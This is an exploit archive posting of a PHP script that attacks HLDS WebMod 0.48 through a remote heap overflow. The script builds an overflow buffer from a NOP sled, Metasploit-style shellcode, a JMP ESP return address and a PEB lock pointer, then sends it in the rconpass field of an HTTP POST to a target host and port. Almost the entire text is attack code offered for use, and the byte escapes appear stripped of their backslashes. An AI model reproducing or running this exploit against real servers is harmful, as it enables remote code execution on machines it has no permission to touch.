hlds-heap.txt
Posted on 06 May 2008
<?php ## HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit ## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew ## shir, skod.uk [at] gmail [dot] com ## 17/12/2007 ## Registers (rconpass = "A"x16444): # EAX 67E04955 w_mm.67E04955 # ECX 41414141 # EDX 41414141 # EBX 0000000A # ESP 08F650FC # EBP 08F726D4 # ESI 08F72734 # EDI 00000000 # EIP 67E0498C w_mm.67E0498C ######### error_reporting(7); ini_set("max_execution_time",0); if($_SERVER['argv'][1] && $_SERVER['argv'][2]) { $host = $_SERVER['argv'][1]; $port = $_SERVER['argv'][2]; } else { echo (" HLDS WebMod 0.48 Remote Heap Overflow Exploit "); echo ("Written by shir, skod.ukx40gmailx2Ecom "); echo ("Usage: php {$_SERVER['argv'][0]} IP PORT "); echo ("Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015 "); exit(); } echo "[~] Packing... "; $scode = "x66x83xC0x04xFFxE0"; /*ADD EAX, 4 => JMP EAX*/ # win32_bind - Calc executer. Metasploit.com $shellcode = "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xf4". "x47xbaxa4x83xebxfcxe2xf4x08xafxfexa4xf4x47x31xe1". "xc8xccxc6xa1x8cx46x55x2fxbbx5fx31xfbxd4x46x51xed". "x7fx73x31xa5x1ax76x7ax3dx58xc3x7axd0xf3x86x70xa9". "xf5x85x51x50xcfx13x9exa0x81xa2x31xfbxd0x46x51xc2". "x7fx4bxf1x2fxabx5bxbbx4fx7fx5bx31xa5x1fxcexe6x80". "xf0x84x8bx64x90xccxfax94x71x87xc2xa8x7fx07xb6x2f". "x84x5bx17x2fx9cx4fx51xadx7fxc7x0axa4xf4x47x31xcc". "xc8x18x8bx52x94x11x33x5cx77x87xc1xf4x9cxb7x30xa0". "xabx2fx22x5ax7ex49xedx5bx13x24xdbxc8x97x47xbaxa4"; $evilcode = str_repeat("x90", 100); $evilcode.= $shellcode; $evilcode.= str_repeat("x90", 16156-(strlen($shellcode))); $evilcode.= "xFDxAFx6Ax07"; #076AAFFD FFE4 => JMP ESP (cstrikedllsmp.dll) $evilcode.= str_repeat("x90", 60-(strlen($scode))); $evilcode.= $scode; $evilcode.= str_repeat("x90", 8); $evilcode.= str_repeat("0", 72); $evilcode.= str_repeat("%00", 4); $evilcode.= str_repeat("0", 4); $evilcode.= "x20xF0xFDx7F"; #Windows PEB Lock Pointer $evilcode.= str_repeat("%00", 8); $post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass"; $pack = "POST /auth.w?redir= HTTP/1.1 "; $pack.= "Host: {$host}:{$port} "; $pack.= "User-Agent: Mozilla/5.0 "; $pack.= "Accept: */* "; $pack.= "Accept-Language: en-us,en;q=0.5 "; $pack.= "Accept-Encoding: gzip,deflate "; $pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "; $pack.= "Keep-Alive: 300 "; $pack.= "Connection: keep-alive "; $pack.= "Content-Type: application/x-www-form-urlencoded "; $pack.= "Content-Length: ". strlen($post) ." " . $post; echo "[~] Sending... "; $sock = @fsockopen($host, $port, $errno, $errstr, 10); if ($errstr) echo("[-] Can't connect {$host}:{$port} "); else { fputs($sock, $pack); $tmp = fgets($sock,1024); if(strstr($tmp, '<')) echo "[-] Failed, you better try again. "; else echo "[+] Shellcode should be executed. "; fclose($sock); } ?>
